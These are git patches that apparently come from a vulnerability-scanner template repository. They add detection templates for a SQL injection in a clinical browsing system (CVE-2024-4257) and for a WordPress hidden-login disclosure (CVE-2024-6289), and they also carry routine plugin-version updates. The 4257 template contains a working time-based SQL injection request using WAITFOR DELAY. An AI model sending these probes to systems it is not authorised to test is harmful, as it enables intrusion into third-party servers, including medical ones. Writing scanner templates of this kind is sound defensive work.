8c3bf3a1dd6af827c9827e002ba40726f5008965 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 15 Jul 2024 21:21:00 +0300 Subject: [PATCH 203/247] add cve-2024-4257 --- http/cves/2024/CVE-2024-4257.yaml | 42 +++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2024/CVE-2024-4257.yaml diff --git a/http/cves/2024/CVE-2024-4257.yaml b/http/cves/2024/CVE-2024-4257.yaml new file mode 100644 index 00000000000..3a2d864af7f --- /dev/null +++ b/http/cves/2024/CVE-2024-4257.yaml @@ -0,0 +1,42 @@ +id: CVE-2024-4257 + +info: + name: BlueNet Technology Clinical Browsing System 1.2.1 - Sql Injection + author: securityforeveryone + severity: medium + description: | + A vulnerability was found in BlueNet Technology Clinical Browsing System 1.2.1. It has been classified as critical. This affects an unknown part of the file /xds/deleteStudy.php. The manipulation of the argument documentUniqueId leads to sql injection. It is possible to initiate the attack remotely. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-4257 + - https://github.com/GAO-UNO/cve/blob/main/sql.md + - https://vuldb.com/?submit.321338 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L + cvss-score: 6.3 + cve-id: CVE-2024-4257 + cwe-id: CWE-89 + epss-score: 0.00045 + epss-percentile: 0.15929 + metadata: + verified: true + max-request: 1 + vendor: BlueNet Technology + product: Clinical Browsing System + fofa-query: app="LANWON-临床浏览系统" + tags: cve,cve2024,sqli,blunet + +http: + - raw: + - | + @timeout 20s + GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:6%27-- HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=6' + - 'contains(header,"text/html")' + - 'status_code == 200' + condition: and From 4b77efe4b8629265159e52f95cc483f6f10b19e4 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Mon, 15 Jul 2024 21:23:47 +0300 Subject: [PATCH 204/247] add CVE-2024-6289 --- http/cves/2024/CVE-2024-6289.yaml | 46 +++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 http/cves/2024/CVE-2024-6289.yaml diff --git a/http/cves/2024/CVE-2024-6289.yaml b/http/cves/2024/CVE-2024-6289.yaml new file mode 100644 index 00000000000..ba918d7cafd --- /dev/null +++ b/http/cves/2024/CVE-2024-6289.yaml @@ -0,0 +1,46 @@ +id: CVE-2024-6289 + +info: + name: WPS Hide Login < 1.9.16.4 - Hidden Login Page Disclosure + author: securityforeveryone + severity: medium + description: | + The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page. + reference: + - https://wpscan.com/vulnerability/fd6d0362-df1d-4416-b8b5-6e5d0ce84793/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-6289 + - https://www.sprocketsecurity.com/resources/discovering-wp-admin-urls-in-wordpress-with-gravityforms/ + classification: + epss-score: 0.00043 + epss-percentile: 0.09266 + metadata: + verified: true + max-request: 1 + vendor: wpserveur + product: wps_hide_login + framework: wordpress + publicwww-query: "/wp-content/plugins/wps-hide-login/" + tags: cve,cve2024,bypass,wp-plugin,wpscan,wordpress + +http: + - raw: + - | + GET /wp-content/plugins/wps-hide-login/readme.txt HTTP/1.1 + Host: {{Hostname}} + + - | + GET /?gf_page=randomstring HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body_1,"WPS Hide Login") && status_code_1 == 200' + - '!contains(tolower(location_2), "wp-login.php")' + - 'contains(header_2,"%2F%3Fgf_page%3Drandomstring&reauth=1")' + condition: and + + extractors: + - type: kval + kval: + - location From 855a34aa73cdc06fc4544882c9c92829dc12dee0 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Tue, 16 Jul 2024 00:06:18 +0530 Subject: [PATCH 205/247] Update and rename adcs-detect.yaml to http/exposures/files/adcs-detect.yaml --- adcs-detect.yaml | 28 --------------------------- http/exposures/files/adcs-detect.yaml | 27 ++++++++++++++++++++++++++ 2 files changed, 27 insertions(+), 28 deletions(-) delete mode 100644 adcs-detect.yaml create mode 100644 http/exposures/files/adcs-detect.yaml diff --git a/adcs-detect.yaml b/adcs-detect.yaml deleted file mode 100644 index c23078450b6..00000000000 --- a/adcs-detect.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: adcs-detect - -info: - name: ADCS - Detect - author: pastaga,defte - severity: info - description: | - ADCS Detection checks for common redirection on potential ADCS endpoints. It should be used with the list of all domain servers like `cat servers_ips.txt | nuclei -id adcs-detect` - tags: ad,adcs - -http: - - method: GET - path: - - "{{BaseURL}}/certenroll" - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "Location: {{BaseURL}}/certenroll/" - - - type: status - status: - - 300 - - 301 - - 302 - condition: or diff --git a/http/exposures/files/adcs-detect.yaml b/http/exposures/files/adcs-detect.yaml new file mode 100644 index 00000000000..6bf0001b6c3 --- /dev/null +++ b/http/exposures/files/adcs-detect.yaml @@ -0,0 +1,27 @@ +id: adcs-detect + +info: + name: Certification Authority Web Enrollment (ADCS) - Detection + author: pastaga,defte + severity: info + description: | + Web Enrollment is a service that can be installed on an AD CS server to allow users and computers in an Active Directory domain to request a certificate through an interactive web page. + metadata: + verified: true + shodan-query: html:"/certenroll" + tags: ad,adcs,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/certenroll/" + - "{{BaseURL}}/CertEnroll/" + + host-redirects: true + matchers: + - type: dsl + dsl: + - contains(body, ".crl") || contains(body, ".crt") + - contains(body, "CertEnroll") || contains(body, "certenroll") + - status_code == 200 + condition: and From 52e54e601083f26ed072842b9d4f9757ec73dde1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 16 Jul 2024 01:04:59 +0530 Subject: [PATCH 206/247] minor update --- http/cves/2024/CVE-2024-4257.yaml | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-4257.yaml b/http/cves/2024/CVE-2024-4257.yaml index 3a2d864af7f..403b4f0e957 100644 --- a/http/cves/2024/CVE-2024-4257.yaml +++ b/http/cves/2024/CVE-2024-4257.yaml @@ -20,19 +20,32 @@ info: metadata: verified: true max-request: 1 - vendor: BlueNet Technology - product: Clinical Browsing System fofa-query: app="LANWON-临床浏览系统" tags: cve,cve2024,sqli,blunet +flow: http(1) && http(2) + http: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body,"临床浏览")' + - 'contains(header,"text/html")' + - 'status_code == 200' + condition: and + internal: true + - raw: - | @timeout 20s GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:6%27-- HTTP/1.1 Host: {{Hostname}} - matchers-condition: and matchers: - type: dsl dsl: From 8c3d4cdf80a5e4c5ab4bd76acef096a9682acdfe Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 16 Jul 2024 01:13:56 +0530 Subject: [PATCH 207/247] minor update --- http/cves/2024/CVE-2024-6289.yaml | 24 +++++++++++++++++++----- 1 file changed, 19 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-6289.yaml b/http/cves/2024/CVE-2024-6289.yaml index ba918d7cafd..fb0df7815e5 100644 --- a/http/cves/2024/CVE-2024-6289.yaml +++ b/http/cves/2024/CVE-2024-6289.yaml @@ -6,6 +6,7 @@ info: severity: medium description: | The WPS Hide Login WordPress plugin before 1.9.16.4 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page. + remediation: Fixed in 1.9.16.4 reference: - https://wpscan.com/vulnerability/fd6d0362-df1d-4416-b8b5-6e5d0ce84793/ - https://nvd.nist.gov/vuln/detail/CVE-2024-6289 @@ -20,7 +21,12 @@ info: product: wps_hide_login framework: wordpress publicwww-query: "/wp-content/plugins/wps-hide-login/" - tags: cve,cve2024,bypass,wp-plugin,wpscan,wordpress + tags: cve,cve2024,bypass,wp-plugin,wpscan,wordpress,wps-hide-login + +flow: http(1) && http(2) + +variables: + string: "{{rand_text_alpha(10)}}" http: - raw: @@ -28,16 +34,24 @@ http: GET /wp-content/plugins/wps-hide-login/readme.txt HTTP/1.1 Host: {{Hostname}} + matchers: + - type: dsl + dsl: + - 'contains(body,"WPS Hide Login")' + - 'status_code == 200' + condition: and + internal: true + + - raw: - | - GET /?gf_page=randomstring HTTP/1.1 + GET /?gf_page={{string}} HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - - 'contains(body_1,"WPS Hide Login") && status_code_1 == 200' - - '!contains(tolower(location_2), "wp-login.php")' - - 'contains(header_2,"%2F%3Fgf_page%3Drandomstring&reauth=1")' + - '!contains(tolower(location), "wp-login.php")' + - 'contains(header,"%2F%3Fgf_page%3D{{string}}&reauth=1")' condition: and extractors: From 8d0cbc0584f2395bee64574852cad3f66654ce90 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 16 Jul 2024 00:19:56 +0000 Subject: [PATCH 208/247] Auto WordPress Plugins Update [Tue Jul 16 00:19:56 UTC 2024] :robot: --- helpers/wordpress/plugins/amp.txt | 2 +- helpers/wordpress/plugins/elementor.txt | 2 +- helpers/wordpress/plugins/google-site-kit.txt | 2 +- helpers/wordpress/plugins/pixelyoursite.txt | 2 +- .../plugins/woo-checkout-field-editor-pro.txt | 2 +- .../wordpress/plugins/ad-inserter.yaml | 1 - .../wordpress/plugins/add-to-any.yaml | 1 - .../wordpress/plugins/admin-menu-editor.yaml | 1 - .../plugins/advanced-custom-fields.yaml | 1 - .../wordpress/plugins/akismet.yaml | 1 - .../plugins/all-in-one-seo-pack.yaml | 1 - .../plugins/all-in-one-wp-migration.yaml | 1 - .../all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - .../wordpress/plugins/antispam-bee.yaml | 1 - .../wordpress/plugins/astra-sites.yaml | 1 - .../wordpress/plugins/autoptimize.yaml | 1 - .../wordpress/plugins/backwpup.yaml | 1 - .../plugins/better-search-replace.yaml | 1 - .../wordpress/plugins/better-wp-security.yaml | 1 - .../plugins/black-studio-tinymce-widget.yaml | 1 - .../wordpress/plugins/breadcrumb-navxt.yaml | 1 - .../wordpress/plugins/breeze.yaml | 1 - .../plugins/broken-link-checker.yaml | 1 - .../technologies/wordpress/plugins/chaty.yaml | 1 - .../plugins/child-theme-configurator.yaml | 1 - .../wordpress/plugins/classic-editor.yaml | 1 - .../wordpress/plugins/classic-widgets.yaml | 1 - .../plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - .../wordpress/plugins/coblocks.yaml | 1 - .../wordpress/plugins/code-snippets.yaml | 1 - .../wordpress/plugins/coming-soon.yaml | 1 - .../wordpress/plugins/complianz-gdpr.yaml | 1 - .../plugins/contact-form-7-honeypot.yaml | 1 - .../wordpress/plugins/contact-form-7.yaml | 1 - .../wordpress/plugins/contact-form-cfdb7.yaml | 1 - .../wordpress/plugins/cookie-law-info.yaml | 1 - .../wordpress/plugins/cookie-notice.yaml | 1 - .../wordpress/plugins/copy-delete-posts.yaml | 1 - .../wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../creative-mail-by-constant-contact.yaml | 1 - .../wordpress/plugins/custom-css-js.yaml | 1 - .../wordpress/plugins/custom-fonts.yaml | 1 - .../plugins/custom-post-type-ui.yaml | 1 - .../wordpress/plugins/disable-comments.yaml | 1 - .../wordpress/plugins/disable-gutenberg.yaml | 1 - .../wordpress/plugins/duplicate-page.yaml | 1 - .../wordpress/plugins/duplicate-post.yaml | 1 - .../wordpress/plugins/duplicator.yaml | 1 - .../duracelltomi-google-tag-manager.yaml | 1 - .../plugins/easy-table-of-contents.yaml | 1 - .../wordpress/plugins/easy-wp-smtp.yaml | 1 - .../wordpress/plugins/elementor.yaml | 1 - .../wordpress/plugins/elementskit-lite.yaml | 1 - .../plugins/enable-media-replace.yaml | 1 - .../wordpress/plugins/envato-elements.yaml | 1 - .../essential-addons-for-elementor-lite.yaml | 1 - .../plugins/ewww-image-optimizer.yaml | 1 - .../plugins/facebook-for-woocommerce.yaml | 1 - .../wordpress/plugins/fast-indexing-api.yaml | 1 - .../favicon-by-realfavicongenerator.yaml | 1 - .../wordpress/plugins/flamingo.yaml | 1 - .../wordpress/plugins/fluentform.yaml | 1 - .../wordpress/plugins/font-awesome.yaml | 1 - .../plugins/force-regenerate-thumbnails.yaml | 1 - .../wordpress/plugins/formidable.yaml | 1 - .../wordpress/plugins/forminator.yaml | 1 - .../plugins/ga-google-analytics.yaml | 1 - .../plugins/gdpr-cookie-compliance.yaml | 1 - .../google-analytics-dashboard-for-wp.yaml | 1 - .../google-analytics-for-wordpress.yaml | 1 - .../plugins/google-listings-and-ads.yaml | 1 - .../wordpress/plugins/google-site-kit.yaml | 1 - .../plugins/google-sitemap-generator.yaml | 1 - .../wordpress/plugins/gtranslate.yaml | 1 - .../wordpress/plugins/gutenberg.yaml | 1 - .../plugins/happy-elementor-addons.yaml | 1 - .../plugins/header-footer-code-manager.yaml | 1 - .../plugins/header-footer-elementor.yaml | 1 - .../wordpress/plugins/header-footer.yaml | 1 - .../wordpress/plugins/health-check.yaml | 1 - .../wordpress/plugins/hello-dolly.yaml | 1 - .../plugins/host-webfonts-local.yaml | 1 - .../wordpress/plugins/hostinger.yaml | 1 - .../wordpress/plugins/image-optimization.yaml | 1 - .../wordpress/plugins/imagify.yaml | 1 - .../wordpress/plugins/imsanity.yaml | 1 - .../plugins/insert-headers-and-footers.yaml | 1 - .../wordpress/plugins/instagram-feed.yaml | 1 - .../plugins/intuitive-custom-post-order.yaml | 1 - .../wordpress/plugins/jetpack-boost.yaml | 1 - .../wordpress/plugins/jetpack.yaml | 1 - .../wordpress/plugins/kadence-blocks.yaml | 1 - .../technologies/wordpress/plugins/kirki.yaml | 1 - .../wordpress/plugins/leadin.yaml | 1 - .../limit-login-attempts-reloaded.yaml | 1 - .../plugins/limit-login-attempts.yaml | 1 - .../wordpress/plugins/litespeed-cache.yaml | 1 - .../wordpress/plugins/loco-translate.yaml | 1 - .../wordpress/plugins/loginizer.yaml | 1 - .../plugins/mailchimp-for-woocommerce.yaml | 1 - .../wordpress/plugins/mailchimp-for-wp.yaml | 1 - .../wordpress/plugins/mailpoet.yaml | 1 - .../wordpress/plugins/maintenance.yaml | 1 - .../wordpress/plugins/mainwp-child.yaml | 1 - .../wordpress/plugins/malcare-security.yaml | 1 - .../wordpress/plugins/megamenu.yaml | 1 - .../wordpress/plugins/members.yaml | 1 - .../wordpress/plugins/meta-box.yaml | 1 - .../wordpress/plugins/metform.yaml | 1 - .../wordpress/plugins/ml-slider.yaml | 1 - .../wordpress/plugins/newsletter.yaml | 1 - .../plugins/nextend-facebook-connect.yaml | 1 - .../wordpress/plugins/nextgen-gallery.yaml | 1 - .../wordpress/plugins/ninja-forms.yaml | 1 - .../wordpress/plugins/ocean-extra.yaml | 1 - .../plugins/official-facebook-pixel.yaml | 1 - .../plugins/one-click-demo-import.yaml | 1 - .../wordpress/plugins/optinmonster.yaml | 1 - .../wordpress/plugins/otter-blocks.yaml | 1 - .../wordpress/plugins/password-protected.yaml | 1 - .../wordpress/plugins/pdf-embedder.yaml | 1 - .../plugins/pinterest-for-woocommerce.yaml | 1 - .../wordpress/plugins/pixelyoursite.yaml | 1 - .../wordpress/plugins/polylang.yaml | 1 - .../wordpress/plugins/popup-maker.yaml | 1 - .../wordpress/plugins/post-smtp.yaml | 1 - .../wordpress/plugins/post-types-order.yaml | 1 - .../plugins/premium-addons-for-elementor.yaml | 1 - .../wordpress/plugins/pretty-link.yaml | 1 - .../plugins/really-simple-captcha.yaml | 1 - .../wordpress/plugins/really-simple-ssl.yaml | 1 - .../wordpress/plugins/redirection.yaml | 1 - .../wordpress/plugins/redux-framework.yaml | 1 - .../plugins/regenerate-thumbnails.yaml | 1 - .../plugins/royal-elementor-addons.yaml | 1 - .../wordpress/plugins/safe-svg.yaml | 1 - .../wordpress/plugins/seo-by-rank-math.yaml | 1 - .../wordpress/plugins/sg-cachepress.yaml | 1 - .../wordpress/plugins/sg-security.yaml | 1 - .../plugins/shortcodes-ultimate.yaml | 1 - .../plugins/shortpixel-image-optimiser.yaml | 1 - .../plugins/simple-custom-post-order.yaml | 1 - .../wordpress/plugins/simple-history.yaml | 1 - .../wordpress/plugins/siteguard.yaml | 1 - .../wordpress/plugins/siteorigin-panels.yaml | 1 - .../wordpress/plugins/smart-slider-3.yaml | 1 - .../wordpress/plugins/so-widgets-bundle.yaml | 1 - .../sticky-header-effects-for-elementor.yaml | 1 - .../stops-core-theme-and-plugin-updates.yaml | 1 - .../wordpress/plugins/sucuri-scanner.yaml | 1 - .../plugins/table-of-contents-plus.yaml | 1 - .../wordpress/plugins/tablepress.yaml | 1 - .../plugins/taxonomy-terms-order.yaml | 1 - .../wordpress/plugins/templately.yaml | 1 - .../plugins/the-events-calendar.yaml | 1 - .../wordpress/plugins/tinymce-advanced.yaml | 1 - .../plugins/translatepress-multilingual.yaml | 1 - .../ultimate-addons-for-gutenberg.yaml | 1 - .../plugins/under-construction-page.yaml | 1 - .../wordpress/plugins/updraftplus.yaml | 1 - .../wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/w3-total-cache.yaml | 1 - .../plugins/webp-converter-for-media.yaml | 1 - .../wordpress/plugins/webp-express.yaml | 1 - .../plugins/widget-importer-exporter.yaml | 1 - .../woo-cart-abandonment-recovery.yaml | 1 - .../woo-checkout-field-editor-pro.yaml | 1 - .../plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-stripe.yaml | 1 - .../plugins/woocommerce-legacy-rest-api.yaml | 1 - .../plugins/woocommerce-payments.yaml | 1 - .../plugins/woocommerce-paypal-payments.yaml | 3 +- ...oocommerce-pdf-invoices-packing-slips.yaml | 1 - .../plugins/woocommerce-services.yaml | 1 - .../wordpress/plugins/woocommerce.yaml | 1 - .../wordpress/plugins/wordfence.yaml | 1 - .../wordpress/plugins/wordpress-importer.yaml | 1 - .../wordpress/plugins/wordpress-seo.yaml | 1 - .../wordpress/plugins/worker.yaml | 1 - .../wordpress/plugins/wp-crontrol.yaml | 48 +++++++++++++++++++ .../wordpress/plugins/wp-fastest-cache.yaml | 1 - .../wordpress/plugins/wp-file-manager.yaml | 1 - .../wordpress/plugins/wp-google-maps.yaml | 1 - .../wordpress/plugins/wp-mail-smtp.yaml | 1 - .../plugins/wp-maintenance-mode.yaml | 1 - .../wordpress/plugins/wp-migrate-db.yaml | 1 - .../wordpress/plugins/wp-multibyte-patch.yaml | 1 - .../wordpress/plugins/wp-optimize.yaml | 1 - .../wordpress/plugins/wp-pagenavi.yaml | 1 - .../wordpress/plugins/wp-reset.yaml | 1 - .../plugins/wp-reviews-plugin-for-google.yaml | 1 - .../wordpress/plugins/wp-rollback.yaml | 1 - .../wordpress/plugins/wp-seopress.yaml | 1 - .../wordpress/plugins/wp-sitemap-page.yaml | 1 - .../wordpress/plugins/wp-smushit.yaml | 1 - .../wordpress/plugins/wp-statistics.yaml | 1 - .../wordpress/plugins/wp-super-cache.yaml | 1 - .../wordpress/plugins/wpcf7-recaptcha.yaml | 1 - .../wordpress/plugins/wpcf7-redirect.yaml | 1 - .../wordpress/plugins/wpforms-lite.yaml | 1 - .../wordpress/plugins/wps-hide-login.yaml | 1 - .../plugins/wpvivid-backuprestore.yaml | 1 - .../plugins/yith-woocommerce-wishlist.yaml | 1 - 205 files changed, 54 insertions(+), 205 deletions(-) create mode 100644 http/technologies/wordpress/plugins/wp-crontrol.yaml diff --git a/helpers/wordpress/plugins/amp.txt b/helpers/wordpress/plugins/amp.txt index a4db534a2d4..d21aa93ccd4 100644 --- a/helpers/wordpress/plugins/amp.txt +++ b/helpers/wordpress/plugins/amp.txt @@ -1 +1 @@ -2.5.3 \ No newline at end of file +2.5.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementor.txt b/helpers/wordpress/plugins/elementor.txt index d9b2ac520b9..86ad5938a38 100644 --- a/helpers/wordpress/plugins/elementor.txt +++ b/helpers/wordpress/plugins/elementor.txt @@ -1 +1 @@ -3.22.3 \ No newline at end of file +3.23.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-site-kit.txt b/helpers/wordpress/plugins/google-site-kit.txt index 025b749b3aa..21f81fe803a 100644 --- a/helpers/wordpress/plugins/google-site-kit.txt +++ b/helpers/wordpress/plugins/google-site-kit.txt @@ -1 +1 @@ -1.130.0 \ No newline at end of file +1.131.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt index f0ad3287f93..a50bd448726 100644 --- a/helpers/wordpress/plugins/pixelyoursite.txt +++ b/helpers/wordpress/plugins/pixelyoursite.txt @@ -1 +1 @@ -9.7.0 \ No newline at end of file +9.7.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt b/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt index f93ea0ca333..6acdb442890 100644 --- a/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt +++ b/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt @@ -1 +1 @@ -2.0.2 \ No newline at end of file +2.0.3 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 1f058d7d22e..3fd2256749a 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203cfd657a163a51d6ea5d1ffcace355c3bbeac4b88e3f98ea005875c14ee6a446022100c281f7d2ca8628b2c9e03cbcac9fb2d89f1a37b04a98bdf15d8de42296ca8516:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index c796735b9fa..6a0d344b632 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203bd1df3450f4408d403e3c8647a83f2d10f3e5a538fcbd739252b55912f3ad660220711d63a5c1740ea635f331f1b395e5a6162d424eb6355a034bbb4c81e6a20ced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index c9477056075..6fb5080bc80 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201b7c4c23e9b78175f133be8fb3a5b364077942891083eb47188644b8b193256102203475786d505db3a5cea85b2a68d2b8041f8e2c992cd3fc63ee3be7d0ad0e93f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index a359ada3b0a..cddbb4bb2ed 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008f273d9bb5a5800db9cb409844d00d78fec4a3cea580c1ce0ad8419cce74ab1302206d356f2cd8d9d88b8770c1c0343c06a9c7f26b1a9f0c40875974d2237ecf1b70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index edb8c235cc3..6f253f9f556 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022005f9bd434ae860d0557451f0955d772f8d3d4a6622a122158a98e77dd6b44e9f02203515951e0defd8f8386ca32042e6112d2708fa83b1bfc1f3d6d427da9e0d8597:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 94110d9aa18..fe45de4d042 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c0af74aa1b0309f5f438b3219709da1eca95f8d8d473f45e679bcce400a0276f022100f6f8455d8e61ec5ea15f6036489a9854902711ae3e1b492d9719cbdf2eb58dc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index cedf65eabb1..69e425f4469 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204e719c69eeb2e8afe161ed7df2ccb1b55e7e4e1a0279789d9c475349f6517eb8022100f4e5c711c932341c099166d06e5fdb5f734b77e158e11beaff0b0b721f5d1012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 598684daa07..9c07c65e4e6 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bd909cf9f7b3096c8bb2b372fa088ee47b02a656ac46253a8244307004b78e1502203ee92b615ece2db70a6dc51aa0d40f58ef8ba311c7253f157aeb43dcba10a1bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 9fe7ad453ad..92c8f5656e9 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206400dd13973b38a453d36677d8ad8cc9b3d4a18be4fa521345cb7b12fc415eba02201fe575039bef790f887e3f9add5b06a528b8022e1007b3e06a17757a90f6c169:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index e828f8a27d0..70975a19a1f 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022036d7f2d8592acc18f02485d2f1b8f31c0cfce605bc8db078ebaaacd6cee099cb022100f21655e844531bff9b3d54519ea56c368305ab0e0fba6fbd9040974521c08b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 7f3d77e4206..fd7e3e99dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220486205af7a7b8c46fde8599d0d373ee29a1594b501e6cd2b16c8ec0cf85261a60220108403c89e0d01edbdd0a09144a651405ab7171484efd8477ea3793c5e73b3cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 0e6dea51ee6..18f2a2ae84c 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022009ca7266615490f6cdcf6ae734764dceb565b777b8a70a9fb3130d3252b2d8f902202b11fc679bb0290b4b57ab07600cdf83ddcc0563f830c6e051f34630d2287c31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 79f1720d4c2..11cb41fb2ce 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 